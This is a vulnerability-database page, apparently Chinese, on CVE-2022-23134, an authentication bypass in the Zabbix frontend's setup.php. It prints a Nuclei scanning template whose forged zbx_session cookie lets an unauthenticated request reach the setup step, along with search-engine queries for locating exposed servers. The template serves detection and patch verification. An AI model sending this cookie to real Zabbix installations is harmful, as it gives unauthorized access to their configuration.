CVE-2022-23134: Zabbix Setup Configuration Authentication Bypass

日期: 2025-08-01 | 影响软件: Zabbix | POC: 已公开

漏洞描述

After the initial setup process, some steps of setup.php file are reachable not only by super-administrators but also by unauthenticated users. A malicious actor can pass step checks and potentially change the configuration of Zabbix Frontend.

PoC代码[已公开]

id: CVE-2022-23134

info:
  name: Zabbix Setup Configuration Authentication Bypass
  author: bananabr
  severity: medium
  description: After the initial setup process, some steps of setup.php file are reachable not only by super-administrators but also by unauthenticated users. A malicious actor can pass step checks and potentially change the configuration of Zabbix Frontend.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information and potential compromise of the Zabbix setup configuration.
  remediation: |
    Apply the latest security patches or updates provided by Zabbix to fix the authentication bypass vulnerability.
  reference:
    - https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage
    - https://nvd.nist.gov/vuln/detail/CVE-2022-23134
    - https://support.zabbix.com/browse/ZBX-20384
    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6SZYHXINBKCY42ITFSNCYE7KCSF33VRA/
    - https://lists.debian.org/debian-lts-announce/2022/02/msg00008.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
    cvss-score: 5.3
    cve-id: CVE-2022-23134
    cwe-id: CWE-287,CWE-284
    epss-score: 0.93079
    epss-percentile: 0.99779
    cpe: cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: zabbix
    product: zabbix
    shodan-query:
      - http.favicon.hash:892542951
      - http.title:"zabbix-server"
      - cpe:"cpe:2.3:a:zabbix:zabbix"
    fofa-query:
      - icon_hash=892542951
      - app="zabbix-监控系统" && body="saml"
      - title="zabbix-server"
    google-query: intitle:"zabbix-server"
  tags: cve,cve2022,zabbix,auth-bypass,kev

http:
  - method: GET
    path:
      - "{{BaseURL}}/zabbix/setup.php"
      - "{{BaseURL}}/setup.php"

    stop-at-first-match: true

    headers:
      Cookie: "zbx_session=eyJzZXNzaW9uaWQiOiJJTlZBTElEIiwiY2hlY2tfZmllbGRzX3Jlc3VsdCI6dHJ1ZSwic3RlcCI6Niwic2VydmVyQ2hlY2tSZXN1bHQiOnRydWUsInNlcnZlckNoZWNrVGltZSI6MTY0NTEyMzcwNCwic2lnbiI6IklOVkFMSUQifQ%3D%3D"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "Database"
          - "host"
          - "port"
          - "Zabbix"
        condition: and

      - type: word
        words:
          - "youtube_main"
          - "support.google.com"
        part: header
        condition: and
        negative: true

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100961c40b51571c7b79ce46bb7a1912ab41e78380e114914daeb30ddc91b9371fb022100f19ed4172387de08e9ca468181c4e9a06ae07db679adc54797d38c495b698bc9:922c64590222798bb761d5b6d8e72950

相关漏洞推荐